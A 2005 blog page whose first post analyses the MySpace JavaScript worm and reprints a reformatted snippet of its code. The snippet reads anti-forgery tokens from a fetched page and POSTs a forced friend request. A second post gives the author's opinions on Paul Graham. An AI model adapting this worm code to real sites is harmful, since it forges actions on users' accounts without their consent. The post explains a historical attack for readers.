October 13th, 2005

  • evan

myspace worm

MySpace worm using Javascript.
That post hypothesizes the problem is using GET instead of POST (both LJ and Orkut and many other apps did this), but it looks more complicated than that. Here's a reformatted snippet of the worm code, which looks like it GETs one page, retrieves a token from it, and then does the POST to actually make the change:

main(){
var AN=getClientFID();
var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;
J=getXMLObj();
httpSend(BH,getHome,'GET');
xmlhttp2=getXMLObj();
httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}

function processxForm(){
if(xmlhttp2.readyState!=4){return}
var AU=xmlhttp2.responseText;
var AQ=getHiddenParameter(AU,'hashcode');
var AR=getFromURL(AU,'Mytoken');
var AS=new Array();
AS['hashcode']=AQ;
AS['friendID']='11851658';
AS['submit']='Add to Friends';
httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))
}
  • evan

paul graham

I was excited to see Paul Graham speak at OSCON, but I left disappointed. In his writing you get the hint of a smart person enjoying writing and persuasion; in person it was easier to see that he's some Harvard kid who got lucky with a startup and became the sort of megalomaniac you'd expect. And with that in mind his writing took a completely new tone.

So it was refreshing to stumble across this analysis of Hackers and Painters by a Real Painter who calls bullshit on the whole thing.

(Speaking of calling bullshit, this week's Everybody loves Eric Raymond was hilarious.)